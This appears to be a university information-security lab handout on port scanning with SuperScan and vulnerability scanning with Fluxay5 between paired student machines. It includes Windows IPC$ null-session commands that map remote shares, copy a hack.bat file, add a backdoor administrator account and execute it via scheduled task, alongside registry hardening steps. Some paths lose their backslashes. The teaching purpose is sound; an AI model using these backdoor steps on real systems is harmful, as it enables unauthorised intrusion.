實驗2 網(wǎng)絡掃描及安全評估實驗
HUNAN UNIVERSITY《信息安全原理》實驗報告實驗二 網(wǎng)絡掃描及安全評估實驗一、實驗目的掌握網(wǎng)絡端口掃描器的使用方法,熟悉常見端口和其對應的服務程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的方法。
HUNAN UNIVERSITY
《信息安全原理》實驗報告
實驗二 網(wǎng)絡掃描及安全評估實驗
一、實驗目的
掌握網(wǎng)絡端口掃描器的使用方法,熟悉常見端口和其對應的服務程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的方法。
,● 掌握綜合掃描及安全評估工具的使用方法,了解進行簡單系統(tǒng)漏洞入侵的方法,了解常
見的網(wǎng)絡和系統(tǒng)漏洞以及其安全防護方法。
二、實驗原理 ● 端口掃描原理
● 端口掃描向目標主機的TCP/IP服務端口發(fā)送探測數(shù)據(jù)包,并記錄目標主機的響應。
通過分析響應來判斷服務端口是打開還是關(guān)閉,就可以得知端口提供的服務或信息。
● 端口掃描主要有經(jīng)典的掃描器(全連接)、SYN (半連接)掃描器、秘密掃描等。 ● 全連接掃描:掃描主機通過TCP/IP協(xié)議的三次握手與目標主機的指定端口建立一
次完整的連接。建立連接成功則響應掃描主機的SYN/ACK連接請求,這一響應表明目標端口處于監(jiān)聽(打開)的狀態(tài)。如果目標端口處于關(guān)閉狀態(tài),則目標主機會向掃描主機發(fā)送RST 的響應。
● 半連接(SYN )掃描 :若端口掃描沒有完成一個完整的TCP 連接,在掃描主機和目
標主機的一指定端口建立連接時候只完成了前兩次握手,在第三步時,掃描主機中斷了本次連接,使連接沒有完全建立起來,這樣的端口掃描稱為半連接掃描,也稱為間接掃描。
● TCP FIN(秘密)掃描:掃描方法的思想是關(guān)閉的端口會用適當?shù)腞ST 來回復FIN
數(shù)據(jù)包。另一方面,打開的端口會忽略對FIN 數(shù)據(jù)包的回復。
● 綜合掃描和安全評估技術(shù)工作原理
● 獲得主機系統(tǒng)在網(wǎng)絡服務、版本信息、Web 應用等相關(guān)信息,然后采用模擬攻擊的
方法,對目標主機系統(tǒng)進行攻擊性的安全漏洞掃描,如果模擬攻擊成功,則視為漏洞存在。最后根據(jù)檢測結(jié)果向系統(tǒng)管理員提供周密可靠的安全性分析報告。
三、實驗環(huán)境
● 實驗室所有機器安裝了Windows 操作系統(tǒng),并組成了一個局域網(wǎng),并且都安裝了
SuperScan 端口掃描工具和流光Fluxay5綜合掃描工具。
● 每兩個學生為一組:互相進行端口掃描和綜合掃描實驗。
四、實驗內(nèi)容和步驟
● 任務一:使用Superscan 端口掃描工具并分析結(jié)果
● 任務二:使用綜合掃描工具Fluxay5并分析結(jié)果
● 撰寫實驗報告
任務一:使用Superscan 端口掃描工具并分析結(jié)果
Superscan使用簡介:
任務一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))
選擇【Port list setup】,進行端口列表設置
,掃描結(jié)果分析
任務一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))
,分組角色:學生A 、學生B 互相掃描對方主機。
實驗步驟:
(1)在命令符提示下輸入IPCONFIG 查詢自己的IP 地址。
(2)在Superscan 中的Hostname Lookup 欄中,輸入同組學生主機的IP 地址,可通過單擊Lookup 按鈕獲得主機名。
(3)設置IP 欄、Scan type 欄、Scan 欄,使其對同組學生主機的所有端口以默認的時間參數(shù)進行掃描。
(4)根據(jù)掃描結(jié)果分析主機開放的端口類型和對應的服務程序。
(5)通過“控制面板”的“管理工具”中的“服務”配置 ,嘗試關(guān)閉或開放目標主機上的部分服務,重新掃描,觀察掃描結(jié)果的變化。
任務一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))
● 常見端口的關(guān)閉方法:
● 1、關(guān)閉7.9等端口:關(guān)閉Simple TCP/IP Service, 支持以下 TCP/IP 服務:Character
Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、關(guān)閉80端口:關(guān)掉WWW 服務。在“服務”中顯示名稱為“World Wide Web Publishing Service ”,通過 Internet 信息服務的管理單元提供 Web 連接和管理。
3、關(guān)掉25端口:關(guān)閉Simple Mail Transport Protocol (SMTP)服務,它提供的功能是跨網(wǎng)傳送電子郵件。
4、關(guān)掉21端口:關(guān)閉FTP Publishing Service,它提供的服務是通過 Internet 信息服務的管理單元提供 FTP 連接和管理。
5、關(guān)掉23端口:關(guān)閉Telnet 服務,它允許遠程用戶登錄到系統(tǒng)并且使用命令行運行控制臺程序。
6、關(guān)掉139端口,139端口是NetBIOS Session 端口,用來文件和打印共享, 關(guān)閉139口聽方法是在“網(wǎng)絡和撥號連接”中“本地連接”中選取“Internet 協(xié)議(TCP/IP)”屬性,進入“高級TCP/IP設置”“WINS 設置”里面有一項“禁用TCP/IP的NETBIOS ”,打勾就關(guān)閉了139端口。
● 利用TCP/IP篩選:網(wǎng)上鄰居屬性-本地連接屬性-常規(guī)-internet 協(xié)議 (TCP/IP)屬性-
高級-選項-TCP/IP篩選-屬性-TCP 端口-只允許139,445,這樣其他端口都被關(guān)閉了。
任務二:使用流光Fluxay5綜合掃描工具并分析結(jié)果
,各部份功能:
1: 暴力破解的設置區(qū)域
2:控制臺輸出
3:掃描出來的典型漏洞列表
4:掃描或者暴力破解成功的用戶帳號
5:掃描和暴力破解的速度控制
6:掃描和暴力破解時的狀態(tài)顯示
7:中止按鈕
8:探測記錄查找
任務二:使用流光Fluxay5綜合掃描工具并分析結(jié)果(續(xù))
選擇“文件(F )”→“高級掃描向?qū)В╓ )”可打開高級掃描向?qū)?,設置掃描參數(shù) 。 掃描結(jié)束后,流光會自動打開HTML 格式的掃描報告,
而且還把可利用的主機列在流光界面的最下方,如圖1所示。
圖1
單擊主機列表中的主機便可以直接對目標主機進行連接操作,如圖2所示。
圖2
,除了使用“高級掃描向?qū)А迸渲酶呒墥呙柰?,還可以在探測菜單中直接選取高級掃描工具設置:
分組角色:學生A 、學生B 互相掃描對方主機。
實驗步驟:
(1)開放FTP 服務,允許匿名連接。
(2)打開流光FLUXAY5工具,使用“高級掃描向?qū)А边M行設置,使其能對同組學生主機的全部端口、服務、漏洞、所有用戶等進行全面的掃描。
(3)仔細觀察掃描結(jié)果,分析同組學生主機上存在的各種漏洞。
(4)根據(jù)掃描結(jié)果分析FTP 漏洞:如結(jié)果顯示有漏洞,則利用“流光”提供的入侵菜單進行FTP 連接,嘗試上傳或下載文件。
(5)根據(jù)掃描結(jié)果分析IPC$漏洞:
IPC 是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權(quán)限,在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$,連接者可以與目標主機建立一個空連接而無需用戶名和密碼,從而可以得到目標主機上的用戶列表,并可能破解用戶密碼。
IPC$相關(guān)命令:
● 建立和目標的ipc$連接命令:net use 目標IPipc$ “密碼” /user:“ADMIN ”
(管理員賬號),如:net use 2.168.27.128ipc$ “” /user:"administrator" ● 映射網(wǎng)絡驅(qū)動器命令(將目標主機的盤映射到本地磁盤 ):net use 本地盤符
目標IP 盤符$,如:net use z: 2.168.27.128c$
● 和目標建立了ipc$后,則可直接用IP 加盤符加$訪問。比如:copy 文件名 IP
盤符$路徑文件名,如:copy hack.bat 2.168.27.128c$,也可直接對映射為本地磁盤的網(wǎng)絡驅(qū)動器操作。
● 管理計算機上面的賬號命令:net user
● 查看賬號命令:net user
● 建立賬號命令:net user name passwd /add(net user sysbak 123456 /add :
添加用戶名為sysback ,密碼為123456的賬號 )
刪除賬號命令:net user name /delete
● 管理工作組命令:net localgroup 組名 用戶名 /add[delete]
● 如:net localgroup administrators sysback /add。該命令表示把sysback
用戶添加到管理員組(administrators )。
● 查看目標計算機的系統(tǒng)時間:net time ip
,● 在遠程主機上建立計劃任務:at IP TIME COMMAND
● at 2.168.27.128 13:45 c:hack.bat (該命令表示在下午13點45分執(zhí)
行目標主機C 盤中的hack.bat 文件, 時間一定要晚于當前遠程主機系統(tǒng)時間) ● 刪除和目標的ipc$連接命令: net use IPipc$ /del
● 斷開所有IPC$連接: net use * /del
● 禁止建立空連接 :運行regedit ,找到主鍵[HKEY_LOCAL_MACHINE SYSTEM
CurrentControlSet Control LSA] ,把RestrictAnonymous (DWORD )的鍵值改為:00000001。
禁止自動打開默認共享 :找到主鍵
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters],把AutoShareServer (DWORD )的鍵值改為:00000000,
如果不存在,就新建一個再改鍵值。
● 利用破解的用戶ADMINISTRATOR 對目標主機進行留后門入侵,步驟:
● 編寫批處理文件hack.bat ,文件中包含兩個命令:1)建立一個新賬號,2)將新
賬號加入administrators 組。
● 使用net 命令與目標主機建立連接
● 將批處理文件hack.back 拷貝至目標主機上。
● 通過計劃任務使目標主機執(zhí)行hack.bat 文件。
● 斷開所有IPC$連接。
● 通過采用新賬號與目標主機建立連接來驗證賬號是否成功建立。
● 刪除和目標主機的連接。
● 執(zhí)行安全防護措施:
● 目標主機對注冊表進行修改:禁止建立空連接,禁止自動打開默認共享 ● 重新使用net 命令與目標主機建立連接,觀察結(jié)果是否有變化。
實驗報告要求
內(nèi)容:
一、根據(jù)任務一的掃描結(jié)果,寫出主機開放的端口類型和服務。同時寫出嘗試關(guān)閉或開放目標主機上的部分服務后重新掃描的新結(jié)果。
二、根據(jù)任務二的掃描結(jié)果,記錄被掃描方的用戶列表、提供的服務、共享的目錄和已經(jīng)存在的漏洞,分析這些漏洞,寫出是系統(tǒng)哪方面設置防范不合理造成的,寫出解決措施。
,實驗結(jié)果:
1. 使用Superscan 端口掃描工具
在使用軟件之前,我們先來看看軟件的全貌(圖一)
圖一
界面比較復雜,我們根據(jù)共享功能來介紹使用。
一)域名(主機名)和IP 相互轉(zhuǎn)換
這個功能的作用就是取得域名比如:163.com 的IP ;或者根據(jù)IP :202.106.185.77取得域名。
在SuperScan 里面,有兩種方法來實現(xiàn)此功能:
(1)通過Hostname Lookup來實現(xiàn)(如圖二)
圖二